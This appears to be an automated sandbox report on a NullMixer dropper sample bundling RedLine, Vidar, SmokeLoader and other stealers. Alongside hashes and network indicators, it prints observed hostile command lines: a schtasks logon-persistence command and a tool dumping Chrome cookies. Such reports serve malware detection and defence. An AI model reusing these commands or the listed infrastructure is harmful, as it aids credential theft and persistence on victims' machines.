Malware Analysis Report

2024-10-19 02:13

Sample ID 231231-e2x8msbcbl
Target 281c7ba6787d047d9eff840c79c19816
SHA256 aa9b8b79b9b4e0478e85c4ae5b08c15aadea45cac7617de2c298070fd781748e
Tags
nullmixer redline sectoprat smokeloader vidar 706 olkani pub5 aspackv2 backdoor dropper infostealer rat stealer trojan upx fabookie privateloader risepro loader spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

aa9b8b79b9b4e0478e85c4ae5b08c15aadea45cac7617de2c298070fd781748e

Threat Level: Known bad

The file 281c7ba6787d047d9eff840c79c19816 was found to be: Known bad.

Malicious Activity Summary

nullmixer redline sectoprat smokeloader vidar 706 olkani pub5 aspackv2 backdoor dropper infostealer rat stealer trojan upx fabookie privateloader risepro loader spyware

RedLine

Vidar

NullMixer

Fabookie

SectopRAT

SmokeLoader

RedLine payload

PrivateLoader

SectopRAT payload

Detect Fabookie payload

RisePro

Nirsoft

Vidar Stealer

UPX packed file

ASPack v2.12-2.42

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Program crash

Unsigned PE

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-31 04:26

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-31 04:26

Reported

2024-01-02 05:17

Platform

win7-20231129-en

Max time kernel

0s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe"

Signatures

NullMixer

dropper nullmixer

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1748 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1748 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1748 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1748 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1748 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1748 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1748 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1996 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC707336\setup_install.exe
PID 1996 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC707336\setup_install.exe
PID 1996 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC707336\setup_install.exe
PID 1996 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC707336\setup_install.exe
PID 1996 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC707336\setup_install.exe
PID 1996 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC707336\setup_install.exe
PID 1996 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC707336\setup_install.exe

Processes

C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe

"C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_5.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_1.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_1.exe" -a

C:\Users\Admin\AppData\Local\Temp\is-R0QKR.tmp\sonia_5.tmp

"C:\Users\Admin\AppData\Local\Temp\is-R0QKR.tmp\sonia_5.tmp" /SL5="$201D8,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_5.exe"

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_8.exe

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704172488 0

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_9.exe

sonia_9.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 424

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_5.exe

sonia_5.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_3.exe

sonia_3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_7.exe

sonia_7.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_8.exe

sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_4.exe

sonia_4.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_6.exe

sonia_6.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_1.exe

sonia_1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_7.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\sonia_2.exe

sonia_2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_3.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_1.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCC707336\setup_install.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2792 -s 956

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

Network

Country Destination Domain Proto
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 superstationcity.com udp
DE 194.163.135.248:80 superstationcity.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 104.26.4.15:443 db-ip.com tcp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 www.microsoft.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 api.db-ip.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 104.26.5.15:443 api.db-ip.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 www.maxmind.com udp
US 104.18.145.235:80 www.maxmind.com tcp
NL 37.0.8.235:80 tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 172.64.149.23:80 crl.usertrust.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 aucmoney.com udp
US 3.141.96.53:443 live.goatgame.live tcp
DE 194.163.135.248:80 superstationcity.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
US 172.67.132.113:443 iplogger.org tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 thegymmum.com udp
NL 37.0.11.8:80 tcp
US 8.8.8.8:53 atvcampingtrips.com udp
US 8.8.8.8:53 kuapakualaman.com udp
US 8.8.8.8:53 renatazarazua.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 nasufmutlu.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 most-fast-link-download.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 sanctam.net udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 github.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 5edda3e85ac52ccfd566fe8fb4cf39eb
SHA1 8afc0f9b3c121b02d5ea2089bfa4a0e52d1be0c1
SHA256 c812b0194edb10563ab2776b2f1355aa347006542bd0179e1287a06c86440011
SHA512 46b03ebb82e03ae86497ffcdec017237dec4a638d90dbe3a06d259802f0418af473510fa23735b55ecc72bbcde83f7c4d153e3c9cc82fbf1121aded9e056c43a

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 8852c87022bfd885eee1f5042c174e69
SHA1 e533583663ea373ed0f2373429eebb76095eafdc
SHA256 b74941b7ca4073da3811c43f460a34cf8d0961b28184dc8587393a2ae712250a
SHA512 6172e120caad1edd2ca931e4b32b7bffac7af68efd3d696a7d51ae00189de43bed2ef3fe2b244e9652cc42ec722dc61bd3c325e95d18635cc6b77495490b5da7

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 1c54b87d200630284ab2e20dfce4c5d2
SHA1 08823afa8766ae3f1414c25fbb4560e169125174
SHA256 7f03656ca0b99bd4f1fe6530fd9b83d0d9206a456edb279badd19f19f6802bf6
SHA512 ddc472bffda4f8810bad287de6b977d21651cb886b51f0aa955ef97f7359b68b6810d588e6ded59e82cb61a4c01ea464db633eebde510f3897dba8c94248eb56

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 ec4e09376dc16ba224e302c6539c2535
SHA1 cf054983294975b1c47ae9e415675b7f594935fb
SHA256 0a52e61c606002947c4b336469636f643c55fdf752a919c182c051f85660d248
SHA512 184281cc7921d44c1671ad8bcbf8420400bf1e1945f861c99ca4264514afd1f5a2ea90a5b8dd8f860505b51f61ff56cfe9b54900595ba5f8c995e71f29edbcc3

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 f50e3c9dab41fff49ef3ef06d0df3fb3
SHA1 cc81aead7c570cd4d66c8af19160271481aee2bb
SHA256 0b4ffa804ab4a271df8df1f8ebda7b6dfbcf0ed430711293f7126d5ea0379fcd
SHA512 05a795c78cab3ba94dc8cca39b7cefd0dba67779bb73d9209b9f83db903be7dc9b3cc991ac373f5a5a86715247866fe5155a2f6ee7ea54b2ddf77aa17ab70c40

memory/1996-53-0x0000000003340000-0x000000000345D000-memory.dmp

memory/2564-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2564-74-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2564-77-0x0000000000520000-0x000000000063D000-memory.dmp

memory/2564-84-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2564-88-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2680-136-0x0000000000400000-0x000000000046D000-memory.dmp

memory/2684-140-0x0000000000040000-0x000000000012E000-memory.dmp

memory/1088-141-0x0000000000CD0000-0x0000000000D0A000-memory.dmp

memory/1260-139-0x0000000000B10000-0x0000000000B7A000-memory.dmp

memory/2792-155-0x0000000003090000-0x000000000312D000-memory.dmp

memory/1704-158-0x0000000000250000-0x0000000000259000-memory.dmp

memory/1088-159-0x00000000009A0000-0x00000000009C8000-memory.dmp

memory/1704-157-0x0000000002D30000-0x0000000002E30000-memory.dmp

memory/1704-164-0x0000000000400000-0x0000000002C67000-memory.dmp

memory/864-165-0x00000000001B0000-0x0000000000294000-memory.dmp

memory/2792-170-0x0000000000400000-0x0000000002CC3000-memory.dmp

memory/2792-172-0x0000000000240000-0x0000000000340000-memory.dmp

memory/832-174-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

memory/1104-180-0x0000000000590000-0x0000000000674000-memory.dmp

memory/1088-176-0x000000001ADD0000-0x000000001AE50000-memory.dmp

memory/832-156-0x000000013F4C0000-0x000000013F4D0000-memory.dmp

memory/1088-152-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

memory/632-192-0x0000000000400000-0x000000000045B000-memory.dmp

memory/1532-196-0x0000000000400000-0x000000000045B000-memory.dmp

memory/2776-197-0x0000000000410000-0x000000000046B000-memory.dmp

memory/2776-195-0x0000000000410000-0x000000000046B000-memory.dmp

memory/2776-194-0x0000000000410000-0x000000000046B000-memory.dmp

memory/2776-193-0x0000000000410000-0x000000000046B000-memory.dmp

memory/1344-208-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1344-206-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1344-204-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1344-202-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1344-201-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1344-200-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1344-199-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1344-198-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2564-92-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2564-91-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2564-90-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2564-89-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2564-86-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2564-85-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2564-83-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2564-82-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2564-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2564-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2564-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2564-76-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2564-73-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2564-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2564-65-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2776-216-0x0000000000410000-0x000000000046B000-memory.dmp

memory/2564-221-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2776-222-0x0000000000410000-0x000000000046B000-memory.dmp

memory/1384-223-0x0000000003EE0000-0x0000000003EF6000-memory.dmp

memory/2244-220-0x0000000000400000-0x000000000045B000-memory.dmp

memory/1704-224-0x0000000000400000-0x0000000002C67000-memory.dmp

memory/2564-219-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2776-218-0x0000000000410000-0x000000000046B000-memory.dmp

memory/2776-217-0x0000000000410000-0x000000000046B000-memory.dmp

memory/1252-215-0x0000000000400000-0x000000000045B000-memory.dmp

memory/2564-64-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSCC707336\libcurl.dll

MD5 673050d625365311e9df1a05df0f7dcb
SHA1 6573c9cf66718492b2b4b72fd53add9a88ac7fce
SHA256 1bc677aa959a8cbf2ea05eabdd1694c7bd03998e31ab19143b17bb65fcfd8e18
SHA512 86e9d8091281cf0387aa5ef48f0193cb5cf644f9c485367e411e3ab50a8440e26c1712f5f06180cf72b09feadc2ae10c4df1698de4088f755a1d3590c80a868b

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\libcurl.dll

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\Users\Admin\AppData\Local\Temp\7zSCC707336\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zSCC707336\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2564-55-0x0000000000400000-0x000000000051D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC707336\setup_install.exe

MD5 7a82c73b9a1b6bf3d2aefe2f3740a564
SHA1 1debd41cb9589c9ebc50b0e370d6d8da565be370
SHA256 35a72b874265e4109dd7d94a37c4417b8fb71a158c4ad10100ef112480b4a8bf
SHA512 61c110e3f12b31fb429afc2fc5b074ab6d4665a8e1b716660bc3f4ef8360ab4187d6137b553430e104998307a849ac9a5db206a2ac20665e890e9bb4c88d6787

memory/1996-51-0x0000000003340000-0x000000000345D000-memory.dmp

memory/2564-325-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2564-324-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2564-322-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2792-326-0x0000000000400000-0x0000000002CC3000-memory.dmp

memory/2564-320-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2304-328-0x0000000000400000-0x0000000000516000-memory.dmp

memory/2680-327-0x0000000000400000-0x000000000046D000-memory.dmp

memory/1088-329-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

memory/832-330-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

memory/2776-342-0x0000000000410000-0x000000000046B000-memory.dmp

memory/1088-341-0x000000001ADD0000-0x000000001AE50000-memory.dmp

memory/2792-340-0x0000000000240000-0x0000000000340000-memory.dmp

memory/2776-361-0x0000000000410000-0x000000000046B000-memory.dmp

memory/2776-363-0x0000000000410000-0x000000000046B000-memory.dmp

memory/2776-362-0x0000000000410000-0x000000000046B000-memory.dmp

memory/2776-364-0x0000000000410000-0x000000000046B000-memory.dmp

memory/1088-444-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

memory/832-455-0x00000000023F0000-0x0000000002470000-memory.dmp

memory/832-453-0x0000000000150000-0x000000000015E000-memory.dmp

memory/1060-461-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

memory/832-460-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

memory/1060-459-0x000000013F5A0000-0x000000013F5B0000-memory.dmp

memory/2680-476-0x0000000000400000-0x000000000046D000-memory.dmp

memory/1060-484-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

memory/1060-492-0x0000000002170000-0x00000000021F0000-memory.dmp

memory/1160-497-0x000000013F160000-0x000000013F166000-memory.dmp

memory/1160-499-0x000000001BC00000-0x000000001BC80000-memory.dmp

memory/1160-498-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

memory/1060-514-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

memory/1160-515-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

memory/1160-516-0x000000001BC00000-0x000000001BC80000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-31 04:26

Reported

2024-01-02 05:17

Platform

win10v2004-20231215-en

Max time kernel

32s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

NullMixer

dropper nullmixer

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

RisePro

stealer risepro

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-996941297-2279405024-2328152752-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
